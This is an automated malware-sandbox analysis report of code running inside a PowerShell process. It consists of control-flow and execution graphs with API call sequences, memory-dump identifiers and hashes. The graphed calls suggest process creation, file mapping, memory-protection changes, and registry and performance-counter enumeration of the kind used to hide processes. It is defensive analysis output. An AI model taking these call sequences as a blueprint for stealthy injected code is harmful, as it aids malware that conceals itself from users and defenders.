                                                  control_flow_graph 360 7ffaab7a0221-7ffaab7a022d 361 7ffaab7a0238-7ffaab7a0249 360->361 362 7ffaab7a022f-7ffaab7a0237 360->362 363 7ffaab7a024b-7ffaab7a028c 361->363 364 7ffaab7a028d-7ffaab7a06f2 361->364 362->361 363->364 372 7ffaab7a06f4-7ffaab7a0703 364->372 373 7ffaab7a0750-7ffaab7a0782 364->373 372->373 374 7ffaab7a0705-7ffaab7a0708 372->374 378 7ffaab7a0784-7ffaab7a0793 373->378 379 7ffaab7a07e0-7ffaab7a0831 373->379 376 7ffaab7a0742-7ffaab7a074a 374->376 377 7ffaab7a070a-7ffaab7a071d 374->377 376->373 380 7ffaab7a071f 377->380 381 7ffaab7a0721-7ffaab7a0734 377->381 378->379 382 7ffaab7a0795-7ffaab7a0798 378->382 389 7ffaab7a0833-7ffaab7a0842 379->389 390 7ffaab7a088f-7ffaab7a08c0 379->390 380->381 381->381 383 7ffaab7a0736-7ffaab7a073e 381->383 384 7ffaab7a07d2-7ffaab7a07da 382->384 385 7ffaab7a079a-7ffaab7a07ad 382->385 383->376 384->379 387 7ffaab7a07af 385->387 388 7ffaab7a07b1-7ffaab7a07c4 385->388 387->388 388->388 391 7ffaab7a07c6-7ffaab7a07ce 388->391 389->390 392 7ffaab7a0844-7ffaab7a0847 389->392 396 7ffaab7a08c2-7ffaab7a08ca 390->396 397 7ffaab7a08ce-7ffaab7a094e CreateProcessA 390->397 391->384 394 7ffaab7a0849-7ffaab7a085c 392->394 395 7ffaab7a0881-7ffaab7a0889 392->395 398 7ffaab7a085e 394->398 399 7ffaab7a0860-7ffaab7a0873 394->399 395->390 396->397 401 7ffaab7a0956-7ffaab7a0993 call 7ffaab7a09af 397->401 402 7ffaab7a0950 397->402 398->399 399->399 400 7ffaab7a0875-7ffaab7a087d 399->400 400->395 405 7ffaab7a0995 401->405 406 7ffaab7a099a-7ffaab7a09ae 401->406 402->401 405->406
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000027.00000002.2300660193.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_39_2_7ffaab790000_powershell.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: 57542af756ab5472e16daaef581d64a993aa90e24b9f7cb4258c75498ce0f93e
                                                  • Instruction ID: 4789144b5a02d48ec2faa5c22020a1c72f69047222d747afdecf8d22576a311d
                                                  • Opcode Fuzzy Hash: 57542af756ab5472e16daaef581d64a993aa90e24b9f7cb4258c75498ce0f93e
                                                  • Instruction Fuzzy Hash: E2D11530509B898FEB64DF28C8467F977E0FF56351F04826ED84DC72A2DA74A4458BC2

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 407 7ffaab79eafa-7ffaab79eb07 408 7ffaab79eb12-7ffaab79ebdf 407->408 409 7ffaab79eb09-7ffaab79eb11 407->409 412 7ffaab79ec3a-7ffaab79ecb7 CreateFileMappingW 408->412 413 7ffaab79ebe1-7ffaab79ebf0 408->413 409->408 420 7ffaab79ecb9 412->420 421 7ffaab79ecbf-7ffaab79ecfb call 7ffaab79ed17 412->421 413->412 414 7ffaab79ebf2-7ffaab79ebf5 413->414 415 7ffaab79ebf7-7ffaab79ec0a 414->415 416 7ffaab79ec2f-7ffaab79ec37 414->416 418 7ffaab79ec0c 415->418 419 7ffaab79ec0e-7ffaab79ec21 415->419 416->412 418->419 419->419 422 7ffaab79ec23-7ffaab79ec2b 419->422 420->421 426 7ffaab79ed02-7ffaab79ed16 421->426 427 7ffaab79ecfd 421->427 422->416 427->426
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000027.00000002.2300660193.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_39_2_7ffaab790000_powershell.jbxd
                                                  Similarity
                                                  • API ID: CreateFileMapping
                                                  • String ID:
                                                  • API String ID: 524692379-0
                                                  • Opcode ID: ba9543335e3340d7e8bad6f99720bcaad984f48755a223a617124e7993e18c60
                                                  • Instruction ID: f00d0546107db139dc3bfd9798b6e51cf9319a5cff4922c121216628f62c72f9
                                                  • Opcode Fuzzy Hash: ba9543335e3340d7e8bad6f99720bcaad984f48755a223a617124e7993e18c60
                                                  • Instruction Fuzzy Hash: 0A71097050DA8D8FDB59DF28C8467E43BE0FF56310F14426AE84DC72A2DA75E845CB81

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 428 7ffaab79e8ac-7ffaab79e8b3 429 7ffaab79e8b5-7ffaab79e8bd 428->429 430 7ffaab79e8be-7ffaab79e957 428->430 429->430 434 7ffaab79e9b2-7ffaab79ea4a CreateFileA 430->434 435 7ffaab79e959-7ffaab79e968 430->435 442 7ffaab79ea52-7ffaab79ea8e call 7ffaab79eaaa 434->442 443 7ffaab79ea4c 434->443 435->434 436 7ffaab79e96a-7ffaab79e96d 435->436 438 7ffaab79e9a7-7ffaab79e9af 436->438 439 7ffaab79e96f-7ffaab79e982 436->439 438->434 440 7ffaab79e984 439->440 441 7ffaab79e986-7ffaab79e999 439->441 440->441 441->441 444 7ffaab79e99b-7ffaab79e9a3 441->444 448 7ffaab79ea95-7ffaab79eaa9 442->448 449 7ffaab79ea90 442->449 443->442 444->438 449->448
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000027.00000002.2300660193.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_39_2_7ffaab790000_powershell.jbxd
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: 286e08bbe06ba434c66e43eb9a26732089991ed6d2a18cd37999db671ba597b0
                                                  • Instruction ID: 23581b21c6ce54fc6a8591263ffc407e176f3bab2a4007ddf851f9853386cc6b
                                                  • Opcode Fuzzy Hash: 286e08bbe06ba434c66e43eb9a26732089991ed6d2a18cd37999db671ba597b0
                                                  • Instruction Fuzzy Hash: 7761FA7091CB8D8FDBA8DF28C8467E437E0FB59350F14426AE84DC3262CA75E8458BC2

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 474 7ffaab79ed66-7ffaab79ed73 475 7ffaab79ed75-7ffaab79ed7d 474->475 476 7ffaab79ed7e-7ffaab79ed8f 474->476 475->476 477 7ffaab79ed9a-7ffaab79ee51 MapViewOfFile 476->477 478 7ffaab79ed91-7ffaab79ed99 476->478 481 7ffaab79ee53 477->481 482 7ffaab79ee59-7ffaab79ee76 477->482 478->477 481->482
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000027.00000002.2300660193.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_39_2_7ffaab790000_powershell.jbxd
                                                  Similarity
                                                  • API ID: FileView
                                                  • String ID:
                                                  • API String ID: 3314676101-0
                                                  • Opcode ID: a1d7aadf52aaef38cb65c4d050db99f2a358a229e75166b06ee12dabcb2b81f9
                                                  • Instruction ID: 82a4ffec3a4e685c2f4d345f236b961f79fbb792fc37181e0c6de8741485a78d
                                                  • Opcode Fuzzy Hash: a1d7aadf52aaef38cb65c4d050db99f2a358a229e75166b06ee12dabcb2b81f9
                                                  • Instruction Fuzzy Hash: 8241283190CA889FEB19DB68D806AE97BF0FF56321F14426ED099C31A2CB756446CB91

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 493 7ffaab79e7a8-7ffaab79e7af 494 7ffaab79e7ba-7ffaab79e870 K32GetModuleInformation 493->494 495 7ffaab79e7b1-7ffaab79e7b9 493->495 498 7ffaab79e872 494->498 499 7ffaab79e878-7ffaab79e8a7 494->499 495->494 498->499
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000027.00000002.2300660193.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_39_2_7ffaab790000_powershell.jbxd
                                                  Similarity
                                                  • API ID: InformationModule
                                                  • String ID:
                                                  • API String ID: 3425974696-0
                                                  • Opcode ID: 97383484a8d3e1f9efb96636f89b716c75247ba48ad9304b20ea4529f0484d7f
                                                  • Instruction ID: e9467ffe0aa487cdb6a105e0c7e8432479e4be8c8b498af14c328aeafb948e11
                                                  • Opcode Fuzzy Hash: 97383484a8d3e1f9efb96636f89b716c75247ba48ad9304b20ea4529f0484d7f
                                                  • Instruction Fuzzy Hash: 5D31263190CA0C8FDB18DBA8D849AF9BBE1EF56321F04427FD049D3292CB7468468B81

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 536 7ffaab862de1-7ffaab862df5 538 7ffaab862df7-7ffaab862e00 536->538 539 7ffaab862e02-7ffaab862e6b 536->539 538->539 550 7ffaab862e72-7ffaab862e76 539->550 551 7ffaab862e7e-7ffaab862ed1 550->551 554 7ffaab862e74-7ffaab862e76 551->554 554->551
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000027.00000002.2302210539.00007FFAAB860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB860000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_39_2_7ffaab860000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8hi
                                                  • API String ID: 0-2684157312
                                                  • Opcode ID: 8e8373f8ed9f2f72715b184d56f40dd4a5874c1b7956cdf3d9b48d0a2a09a21d
                                                  • Instruction ID: 7d560eb71079ee853bb109d4087acd19c2531afafe4e030fd34162c2f74d2c0c
                                                  • Opcode Fuzzy Hash: 8e8373f8ed9f2f72715b184d56f40dd4a5874c1b7956cdf3d9b48d0a2a09a21d
                                                  • Instruction Fuzzy Hash: 7121FB9391FBC94FE3A59B6C58652A8EBC1EF6A290F1940FAD09DC71E3D8186C0D43D1
                                                  Memory Dump Source
                                                  • Source File: 00000027.00000002.2302210539.00007FFAAB860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB860000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_39_2_7ffaab860000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 62123e18b7b7d34adc855414ff418a72ed618cddaa5ae33593ff4453a387841c
                                                  • Instruction ID: 2253751f01e55e249c544ab4f4a368e252a0afeaf76ba6bbe833e3d51e5ede0b
                                                  • Opcode Fuzzy Hash: 62123e18b7b7d34adc855414ff418a72ed618cddaa5ae33593ff4453a387841c
                                                  • Instruction Fuzzy Hash: 08D05E1370E90E8F92A4AB1C24181A8F790DB9D2E1B2086FBC04EC7191C9059C0C4380

                                                  Execution Graph

                                                  Execution Coverage:1.5%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:1399
                                                  Total number of Limit Nodes:2
                                                  execution_graph 7563 1d5478334b8 7564 1d5478334e8 7563->7564 7565 1d5478335a1 7564->7565 7566 1d547833505 PdhGetCounterInfoW 7564->7566 7566->7565 7567 1d547833523 GetProcessHeap HeapAlloc PdhGetCounterInfoW 7566->7567 7568 1d547833555 StrCmpW 7567->7568 7569 1d54783358d GetProcessHeap HeapFree 7567->7569 7568->7569 7571 1d54783356a 7568->7571 7569->7565 7571->7569 7572 1d547833950 StrCmpNW 7571->7572 7573 1d5478339f2 7572->7573 7574 1d547833982 StrStrW 7572->7574 7573->7571 7574->7573 7575 1d54783399b StrToIntW 7574->7575 7575->7573 7576 1d5478339c3 7575->7576 7576->7573 7582 1d547831a30 OpenProcess 7576->7582 7583 1d547831ab6 7582->7583 7584 1d547831a64 K32GetModuleFileNameExW 7582->7584 7583->7573 7588 1d547833f88 7583->7588 7585 1d547831a7e PathFindFileNameW lstrlenW 7584->7585 7586 1d547831aad CloseHandle 7584->7586 7585->7586 7587 1d547831a9c StrCpyW 7585->7587 7586->7583 7587->7586 7589 1d547833f95 StrCmpNIW 7588->7589 7590 1d5478339e4 7588->7590 7589->7590 7590->7573 7591 1d547831cfc 7590->7591 7592 1d547831d1c 7591->7592 7593 1d547831d13 7591->7593 7592->7573 7594 1d547831530 2 API calls 7593->7594 7594->7592 7455 1d547831e3c LoadLibraryA GetProcAddress 7456 1d547831e6f 7455->7456 7457 1d547831e62 SleepEx 7455->7457 7457->7457 8799 1d5478381c0 8800 1d5478381c9 __scrt_acquire_startup_lock 8799->8800 8802 1d5478381cd 8800->8802 8803 1d54783bbb4 8800->8803 8804 1d54783bbd4 8803->8804 8831 1d54783bbed 8803->8831 8805 1d54783bbdc 8804->8805 8806 1d54783bbf2 8804->8806 8807 1d54783d1f4 __std_exception_copy 13 API calls 8805->8807 8808 1d54783e864 56 API calls 8806->8808 8809 1d54783bbe1 8807->8809 8810 1d54783bbf7 8808->8810 8811 1d54783d04c _invalid_parameter_noinfo 38 API calls 8809->8811 8832 1d54783df38 GetModuleFileNameW 8810->8832 8811->8831 8816 1d54783bb54 13 API calls 8817 1d54783bc61 8816->8817 8818 1d54783bc7a 8817->8818 8819 1d54783bc69 8817->8819 8821 1d54783b994 14 API calls 8818->8821 8820 1d54783d1f4 __std_exception_copy 13 API calls 8819->8820 8830 1d54783bc6e 8820->8830 8823 1d54783bc96 8821->8823 8822 1d54783d2a0 __free_lconv_mon 13 API calls 8822->8831 8824 1d54783bcc6 8823->8824 8825 1d54783bcdf 8823->8825 8823->8830 8826 1d54783d2a0 __free_lconv_mon 13 API calls 8824->8826 8827 1d54783d2a0 __free_lconv_mon 13 API calls 8825->8827 8828 1d54783bccf 8826->8828 8827->8830 8829 1d54783d2a0 __free_lconv_mon 13 API calls 8828->8829 8829->8831 8830->8822 8831->8802 8833 1d54783df91 8832->8833 8834 1d54783df7d GetLastError 8832->8834 8836 1d54783dd78 14 API calls 8833->8836 8835 1d54783d184 13 API calls 8834->8835 8837 1d54783df8a 8835->8837 8838 1d54783dfbf 8836->8838 8839 1d547838070 _invalid_parameter_noinfo 8 API calls 8837->8839 8840 1d54783f198 9 API calls 8838->8840 8843 1d54783dfd0 8838->8843 8842 1d54783bc0e 8839->8842 8840->8843 8844 1d54783b994 8842->8844 8850 1d54783de1c 8843->8850 8846 1d54783b9d2 8844->8846 8848 1d54783ba38 8846->8848 8864 1d54783ec1c 8846->8864 8847 1d54783bb25 8847->8816 8848->8847 8849 1d54783ec1c 14 API calls 8848->8849 8849->8848 8851 1d54783de5b 8850->8851 8853 1d54783de40 8850->8853 8852 1d54783de60 8851->8852 8854 1d54783ece8 WideCharToMultiByte 8851->8854 8852->8853 8855 1d54783d1f4 __std_exception_copy 13 API calls 8852->8855 8853->8837 8856 1d54783deb7 8854->8856 8855->8853 8856->8852 8857 1d54783debe GetLastError 8856->8857 8858 1d54783dee9 8856->8858 8859 1d54783d184 13 API calls 8857->8859 8860 1d54783ece8 WideCharToMultiByte 8858->8860 8861 1d54783decb 8859->8861 8862 1d54783df10 8860->8862 8863 1d54783d1f4 __std_exception_copy 13 API calls 8861->8863 8862->8853 8862->8857 8863->8853 8865 1d54783eba8 8864->8865 8866 1d54783dd78 14 API calls 8865->8866 8867 1d54783ebcc 8866->8867 8867->8846 8868 1d5478447c2 8869 1d547839978 __CxxCallCatchBlock 9 API calls 8868->8869 8873 1d5478447d5 8869->8873 8870 1d547844814 __CxxCallCatchBlock 8871 1d547839324 _CallSETranslator 9 API calls 8870->8871 8872 1d547844828 8871->8872 8874 1d547839324 _CallSETranslator 9 API calls 8872->8874 8873->8870 8876 1d547838ff8 __CxxCallCatchBlock 9 API calls 8873->8876 8875 1d547844838 8874->8875 8876->8870 7458 1d547831bc4 7465 1d547831724 GetProcessHeap HeapAlloc 7458->7465 7460 1d547831bd3 7461 1d547831bda SleepEx 7460->7461 7464 1d54783159c StrCmpIW StrCmpW 7460->7464 7516 1d5478319b0 7460->7516 7462 1d547831724 50 API calls 7461->7462 7462->7460 7464->7460 7533 1d547831264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7465->7533 7467 1d54783174c 7534 1d547831000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7467->7534 7469 1d547831754 7535 1d547831264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7469->7535 7471 1d54783175d 7536 1d547831264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7471->7536 7473 1d547831766 7537 1d547831264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7473->7537 7475 1d54783176f 7538 1d547831000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7475->7538 7477 1d547831778 7539 1d547831000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7477->7539 7479 1d547831781 7540 1d547831000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7479->7540 7481 1d54783178a RegOpenKeyExW 7482 1d5478317bc RegOpenKeyExW 7481->7482 7483 1d5478319a2 7481->7483 7484 1d5478317e5 7482->7484 7485 1d5478317fb RegOpenKeyExW 7482->7485 7483->7460 7541 1d5478312b8 RegQueryInfoKeyW 7484->7541 7487 1d547831836 RegOpenKeyExW 7485->7487 7488 1d54783181f 7485->7488 7489 1d54783185a 7487->7489 7490 1d547831871 RegOpenKeyExW 7487->7490 7550 1d54783104c RegQueryInfoKeyW 7488->7550 7493 1d5478312b8 16 API calls 7489->7493 7494 1d547831895 7490->7494 7495 1d5478318ac RegOpenKeyExW 7490->7495 7497 1d547831867 RegCloseKey 7493->7497 7498 1d5478312b8 16 API calls 7494->7498 7499 1d5478318e7 RegOpenKeyExW 7495->7499 7500 1d5478318d0 7495->7500 7497->7490 7501 1d5478318a2 RegCloseKey 7498->7501 7503 1d54783190b 7499->7503 7504 1d547831922 RegOpenKeyExW 7499->7504 7502 1d5478312b8 16 API calls 7500->7502 7501->7495 7507 1d5478318dd RegCloseKey 7502->7507 7508 1d54783104c 6 API calls 7503->7508 7505 1d547831946 7504->7505 7506 1d54783195d RegOpenKeyExW 7504->7506 7509 1d54783104c 6 API calls 7505->7509 7510 1d547831998 RegCloseKey 7506->7510 7511 1d547831981 7506->7511 7507->7499 7512 1d547831918 RegCloseKey 7508->7512 7513 1d547831953 RegCloseKey 7509->7513 7510->7483 7514 1d54783104c 6 API calls 7511->7514 7512->7504 7513->7506 7515 1d54783198e RegCloseKey 7514->7515 7515->7510 7560 1d5478314a0 7516->7560 7533->7467 7534->7469 7535->7471 7536->7473 7537->7475 7538->7477 7539->7479 7540->7481 7542 1d547831486 RegCloseKey 7541->7542 7543 1d547831323 GetProcessHeap HeapAlloc 7541->7543 7542->7485 7544 1d54783134e RegEnumValueW 7543->7544 7545 1d547831472 GetProcessHeap HeapFree 7543->7545 7546 1d5478313a1 7544->7546 7545->7542 7546->7544 7546->7545 7548 1d54783141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 7546->7548 7549 1d5478313cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7546->7549 7555 1d547831530 7546->7555 7548->7546 7549->7548 7551 1d5478311b5 RegCloseKey 7550->7551 7552 1d5478310bf 7550->7552 7551->7487 7552->7551 7553 1d5478310cf RegEnumValueW 7552->7553 7554 1d54783114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7552->7554 7553->7552 7554->7552 7556 1d547831580 7555->7556 7559 1d54783154a 7555->7559 7556->7546 7557 1d547831569 StrCmpW 7557->7559 7558 1d547831561 StrCmpIW 7558->7559 7559->7556 7559->7557 7559->7558 7561 1d5478314e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 7560->7561 7562 1d5478314c2 GetProcessHeap HeapFree 7560->7562 7562->7561 7562->7562 8206 1d54783ae42 8207 1d547839324 _CallSETranslator 9 API calls 8206->8207 8209 1d54783ae4f __CxxCallCatchBlock 8207->8209 8208 1d54783ae93 RaiseException 8210 1d54783aeba 8208->8210 8209->8208 8219 1d547839978 8210->8219 8212 1d547839324 _CallSETranslator 9 API calls 8213 1d54783aefe 8212->8213 8215 1d547839324 _CallSETranslator 9 API calls 8213->8215 8216 1d54783af07 8215->8216 8218 1d54783aeeb __CxxCallCatchBlock 8218->8212 8220 1d547839324 _CallSETranslator 9 API calls 8219->8220 8221 1d54783998a 8220->8221 8222 1d5478399c5 8221->8222 8223 1d547839324 _CallSETranslator 9 API calls 8221->8223 8224 1d547839995 8223->8224 8224->8222 8225 1d547839324 _CallSETranslator 9 API calls 8224->8225 8226 1d5478399b6 8225->8226 8226->8218 8227 1d547838ff8 8226->8227 8228 1d547839324 _CallSETranslator 9 API calls 8227->8228 8229 1d547839006 8228->8229 8229->8218 8230 1d54783f440 GetProcessHeap 9147 1d54783ff40 9148 1d54783ff4b 9147->9148 9156 1d547842c24 9148->9156 9169 1d54783c558 EnterCriticalSection 9156->9169 9170 1d54783ad48 9171 1d547839324 _CallSETranslator 9 API calls 9170->9171 9172 1d54783ad7d 9171->9172 9173 1d547839324 _CallSETranslator 9 API calls 9172->9173 9174 1d54783ad8b __except_validate_context_record 9173->9174 9175 1d547839324 _CallSETranslator 9 API calls 9174->9175 9176 1d54783adcf 9175->9176 9177 1d547839324 _CallSETranslator 9 API calls 9176->9177 9178 1d54783add8 9177->9178 9179 1d547839324 _CallSETranslator 9 API calls 9178->9179 9180 1d54783ade1 9179->9180 9193 1d54783993c 9180->9193 9183 1d547839324 _CallSETranslator 9 API calls 9184 1d54783ae11 __CxxCallCatchBlock 9183->9184 9185 1d547839978 __CxxCallCatchBlock 9 API calls 9184->9185 9190 1d54783aec2 9185->9190 9186 1d54783aeeb __CxxCallCatchBlock 9187 1d547839324 _CallSETranslator 9 API calls 9186->9187 9188 1d54783aefe 9187->9188 9189 1d547839324 _CallSETranslator 9 API calls 9188->9189 9191 1d54783af07 9189->9191 9190->9186 9192 1d547838ff8 __CxxCallCatchBlock 9 API calls 9190->9192 9192->9186 9194 1d547839324 _CallSETranslator 9 API calls 9193->9194 9195 1d54783994d 9194->9195 9196 1d547839958 9195->9196 9197 1d547839324 _CallSETranslator 9 API calls 9195->9197 9198 1d547839324 _CallSETranslator 9 API calls 9196->9198 9197->9196 9199 1d547839969 9198->9199 9199->9183 9199->9184 8231 1d54783824c 8232 1d547838270 __scrt_acquire_startup_lock 8231->8232 8233 1d54783b581 8232->8233 8234 1d54783cb10 __std_exception_copy 13 API calls 8232->8234 8235 1d54783b5aa 8234->8235 8877 1d547835fcc 8878 1d547835fd3 8877->8878 8879 1d547836000 VirtualProtect 8878->8879 8881 1d547835f10 8878->8881 8880 1d547836029 GetLastError 8879->8880 8879->8881 8880->8881 8236 1d547844848 8239 1d54783904c 8236->8239 8240 1d547839076 8239->8240 8241 1d547839064 8239->8241 8243 1d547839324 _CallSETranslator 9 API calls 8240->8243 8241->8240 8242 1d54783906c 8241->8242 8245 1d547839074 8242->8245 8246 1d547839324 _CallSETranslator 9 API calls 8242->8246 8244 1d54783907b 8243->8244 8244->8245 8247 1d547839324 _CallSETranslator 9 API calls 8244->8247 8248 1d54783909b 8246->8248 8247->8245 8249 1d547839324 _CallSETranslator 9 API calls 8248->8249 8250 1d5478390a8 8249->8250 8255 1d54783c2f4 8250->8255 8256 1d54783cab0 _invalid_parameter_noinfo 14 API calls 8255->8256 8257 1d54783c2fd 8256->8257 7595 1d5478386d0 7598 1d5478390c0 7595->7598 7597 1d5478386f9 7599 1d5478390e1 7598->7599 7601 1d547839116 7598->7601 7599->7601 7602 1d54783c328 7599->7602 7601->7597 7603 1d54783c335 7602->7603 7604 1d54783c33f 7602->7604 7603->7604 7609 1d54783c35a 7603->7609 7611 1d54783d1f4 7604->7611 7606 1d54783c346 7614 1d54783d04c 7606->7614 7608 1d54783c352 7608->7601 7609->7608 7610 1d54783d1f4 __std_exception_copy 13 API calls 7609->7610 7610->7606 7617 1d54783cb10 7611->7617 7685 1d54783cef8 7614->7685 7618 1d54783cb59 GetLastError 7617->7618 7620 1d54783cb2f __std_exception_copy 7617->7620 7619 1d54783cb6c 7618->7619 7621 1d54783cb8a SetLastError 7619->7621 7623 1d54783cb87 7619->7623 7624 1d54783c940 __std_exception_copy 11 API calls 7619->7624 7622 1d54783cb54 7620->7622 7626 1d54783c940 GetLastError 7620->7626 7621->7622 7622->7606 7623->7621 7624->7623 7628 1d54783c966 7626->7628 7627 1d54783c96c SetLastError 7629 1d54783c9e5 7627->7629 7628->7627 7644 1d54783d220 7628->7644 7629->7622 7632 1d54783c9a5 FlsSetValue 7635 1d54783c9c8 7632->7635 7636 1d54783c9b1 FlsSetValue 7632->7636 7633 1d54783c995 FlsSetValue 7651 1d54783d2a0 7633->7651 7657 1d54783c758 7635->7657 7638 1d54783d2a0 __free_lconv_mon 7 API calls 7636->7638 7643 1d54783c9c6 SetLastError 7638->7643 7643->7629 7649 1d54783d231 __std_exception_copy 7644->7649 7645 1d54783d282 7647 1d54783d1f4 __std_exception_copy 12 API calls 7645->7647 7646 1d54783d266 HeapAlloc 7648 1d54783c987 7646->7648 7646->7649 7647->7648 7648->7632 7648->7633 7649->7645 7649->7646 7662 1d54783b470 7649->7662 7652 1d54783c9a3 7651->7652 7653 1d54783d2a5 HeapFree 7651->7653 7652->7627 7653->7652 7654 1d54783d2c0 GetLastError 7653->7654 7655 1d54783d2cd __free_lconv_mon 7654->7655 7656 1d54783d1f4 __std_exception_copy 11 API calls 7655->7656 7656->7652 7671 1d54783c630 7657->7671 7665 1d54783b4c0 7662->7665 7670 1d54783c558 EnterCriticalSection 7665->7670 7683 1d54783c558 EnterCriticalSection 7671->7683 7686 1d54783cf23 7685->7686 7693 1d54783cf94 7686->7693 7688 1d54783cf4a 7689 1d54783cf6d 7688->7689 7703 1d54783c3e0 7688->7703 7690 1d54783cf82 7689->7690 7692 1d54783c3e0 _invalid_parameter_noinfo 17 API calls 7689->7692 7690->7608 7692->7690 7716 1d54783ccc8 7693->7716 7699 1d54783cfcf 7699->7688 7704 1d54783c438 7703->7704 7705 1d54783c3ef GetLastError 7703->7705 7704->7689 7706 1d54783c404 7705->7706 7707 1d54783cba0 _invalid_parameter_noinfo 14 API calls 7706->7707 7708 1d54783c41e SetLastError 7707->7708 7708->7704 7709 1d54783c441 7708->7709 7710 1d54783c3e0 _invalid_parameter_noinfo 15 API calls 7709->7710 7711 1d54783c467 7710->7711 7756 1d54783ffe8 7711->7756 7717 1d54783cce4 GetLastError 7716->7717 7718 1d54783cd1f 7716->7718 7719 1d54783ccf4 7717->7719 7718->7699 7722 1d54783cd34 7718->7722 7729 1d54783cba0 7719->7729 7723 1d54783cd68 7722->7723 7724 1d54783cd50 GetLastError SetLastError 7722->7724 7723->7699 7725 1d54783d06c IsProcessorFeaturePresent 7723->7725 7724->7723 7726 1d54783d07f 7725->7726 7734 1d54783cd80 7726->7734 7730 1d54783cbc8 FlsGetValue 7729->7730 7732 1d54783cbc4 7729->7732 7730->7732 7731 1d54783cbde SetLastError 7731->7718 7732->7731 7733 1d54783c940 __std_exception_copy 13 API calls 7732->7733 7733->7731 7735 1d54783cdba _invalid_parameter_noinfo 7734->7735 7736 1d54783cde2 RtlCaptureContext RtlLookupFunctionEntry 7735->7736 7737 1d54783ce64 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7736->7737 7738 1d54783ce2e RtlVirtualUnwind 7736->7738 7740 1d54783ceb6 _invalid_parameter_noinfo 7737->7740 7738->7737 7742 1d547838070 7740->7742 7743 1d547838079 7742->7743 7744 1d547838084 GetCurrentProcess TerminateProcess 7743->7744 7745 1d547838848 IsProcessorFeaturePresent 7743->7745 7746 1d547838860 7745->7746 7751 1d54783891c RtlCaptureContext 7746->7751 7752 1d547838936 RtlLookupFunctionEntry 7751->7752 7753 1d547838873 7752->7753 7754 1d54783894c RtlVirtualUnwind 7752->7754 7755 1d547838814 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7753->7755 7754->7752 7754->7753 7757 1d54783c48f 7756->7757 7758 1d547840001 7756->7758 7760 1d547840054 7757->7760 7758->7757 7764 1d547840a40 7758->7764 7761 1d54783c49f 7760->7761 7762 1d54784006d 7760->7762 7761->7689 7762->7761 7782 1d54783e8c4 7762->7782 7773 1d54783cab0 7764->7773 7766 1d547840a4f 7772 1d547840a95 7766->7772 7781 1d54783c558 EnterCriticalSection 7766->7781 7772->7757 7774 1d54783cb10 __std_exception_copy 13 API calls 7773->7774 7776 1d54783cab9 7774->7776 7775 1d54783cabe 7775->7766 7776->7775 7777 1d54783cae8 FlsGetValue 7776->7777 7779 1d54783cae4 7776->7779 7777->7779 7778 1d54783cafe 7778->7766 7779->7778 7780 1d54783c940 __std_exception_copy 13 API calls 7779->7780 7780->7778 7783 1d54783cab0 _invalid_parameter_noinfo 14 API calls 7782->7783 7784 1d54783e8cd 7783->7784 7785 1d54783b0d4 7792 1d54783b007 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 7785->7792 7786 1d54783b0fb 7797 1d547839324 7786->7797 7788 1d54783b100 7789 1d547839324 _CallSETranslator 9 API calls 7788->7789 7790 1d54783b10b __FrameHandler3::GetHandlerSearchState 7788->7790 7789->7790 7791 1d5478399cc 9 API calls Is_bad_exception_allowed 7791->7792 7792->7786 7792->7790 7792->7791 7794 1d5478399f4 7792->7794 7795 1d547839324 